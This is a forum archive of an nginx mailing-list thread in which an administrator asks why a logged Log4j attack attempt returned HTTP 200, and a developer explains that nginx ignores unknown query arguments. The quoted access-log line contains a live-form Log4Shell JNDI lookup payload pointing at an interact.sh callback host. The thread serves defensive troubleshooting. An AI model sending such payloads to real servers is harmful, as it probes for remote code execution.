Welcome! Log In Create A New Profile

Advanced

Re: Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici
December 29, 2021 01:36PM
Helo Maxim,

thank you very much for the explanation.
In your opinion, is this the case to “fix” this behaviour (but I don’t know how, I’m a newbie, sorry) or I should simply ignore it?

Many thanks again,
Mauro

> On 29 Dec 2021, at 19:29, Maxim Dounin <mdounin@mdounin.ru> wrote:
>
> Hello!
>
> On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote:
>
>> I have an old instance of NGINX (v.1.10.1) running as proxy
>> server on a dedicated hardware platform.
>> Since the proxy service is reachable from internet, it is
>> constantly exposed to cyber attacks.
>> In my particular case, it is attacked by a lot of Log4j attack
>> attempts from several malicious IPs.
>>
>> At this moment, an host intrusion detection system (HIDS) is
>> running and is protecting the NGINX server: it seems it is
>> blocking every malicious attack attempts.
>> Anyway, during the last attack mail notification sent by the
>> HIDS, I noticed that the NGINX server response was “HTTP/1.1
>> 200” and I’m very worried about it.
>> Log4j and Java packages are NOT installed on the NGINX server
>> and all the servers behind the proxy are not using Log4j.
>>
>> Could you please help me to understand the reason why the NGINX
>> server answer was “HTTP/1.1 200”!?
>>
>> You can see below the mail notification I received:
>>
>>
>> Attack Notification.
>> 2021 Dec 28 20:45:59
>>
>> Received From: “hidden_NGINX_server_IP”
>>> /var/log/nginx/access.log
>> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt
>> detected."
>> Src IP: 166.137.252.110
>> Portion of the log(s):
>>
>> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET
>> /?sulgz=${jndi:ldap://“hidden_NGINX_server_IP
>> <ldap://%E2%80%9Chidden_server_IP>".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a
>> <ldap://193.204.199.214.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a>}
>> HTTP/1.1" 200 3700 "-" "curl/7.64.0" “-"
>
> As you can see from the log line, the request is to "/" with some
> additional request arguments ("?sulgz=..."). As unknown request
> arguments are usually ignored, it is no surprise that such a
> request results in 200.
>
> --
> Maxim Dounin
> http://mdounin.ru/
> _______________________________________________
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx


_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
Subject Author Posted

Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici December 29, 2021 09:56AM

Re: Help request about Log4j attack attempts and NGINX logs meaning

gariac December 29, 2021 12:06PM

Re: Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici December 29, 2021 12:22PM

Re: [EXTERNAL] Re: Help request about Log4j attack attempts and NGINX logs meaning

Slaughter, Justin D December 29, 2021 01:14PM

Re: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici December 29, 2021 01:32PM

Re: Help request about Log4j attack attempts and NGINX logs meaning

Maxim Dounin December 29, 2021 01:32PM

Re: Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici December 29, 2021 01:36PM

Re: Help request about Log4j attack attempts and NGINX logs meaning

Maxim Konovalov December 30, 2021 02:22AM

Re: Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici December 30, 2021 03:26AM

Re: Help request about Log4j attack attempts and NGINX logs meaning

gariac December 30, 2021 04:22AM



Sorry, only registered users may post in this forum.

Click here to login

Online Users

Guests: 270
Record Number of Users: 8 on April 13, 2023
Record Number of Guests: 500 on July 15, 2024
Powered by nginx      Powered by FreeBSD      PHP Powered      Powered by MariaDB      ipv6 ready